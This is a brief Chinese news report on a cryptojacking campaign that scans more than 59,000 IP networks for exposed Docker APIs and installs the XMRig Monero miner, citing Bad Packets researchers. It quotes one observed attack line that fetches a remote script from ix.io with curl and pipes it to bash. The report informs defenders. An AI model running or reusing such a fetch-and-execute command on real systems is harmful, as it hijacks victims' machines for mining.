站长之家(ChinaZ.com) 11月28日 消息:据tnw报道,一黑客组织正对企业沙箱软件Docker进行大规模扫描,以搜索系统上易受攻击的端口,以挖掘加密货币。
根据Bad Packets的安全研究人员的说法,从上周末开始的扫描发现了一些漏洞,这些漏洞允许攻击者在公司的Docker实例植入加密货币挖矿恶意代码。
就目前情况来看,攻击者在加密劫持活动已经扫描了超过 59000 个IP网络,寻找易受攻击的Docker实例。研究人员在一个暴露的Docker实例中发现运行下面一行代码:
chroot/mnt/bin/sh-c ' curl-SL4 http://ix.io/1XQa | bash
该恶意代码将从攻击者的服务器下载另一个脚本,然后安装一个加密挖矿工具,Monero miner XMRig。
Bad Packets首席研究官兼联合创始人Troy Mursch称,在这几天针对Docker的攻击活动中,黑客挖掘了14.82 XMR,价值约 740 美元。Mursch建议运行Docker平台的用户立即检查他们是否在互联网上公开了其API端点。
注:Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 Linux或Windows 机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。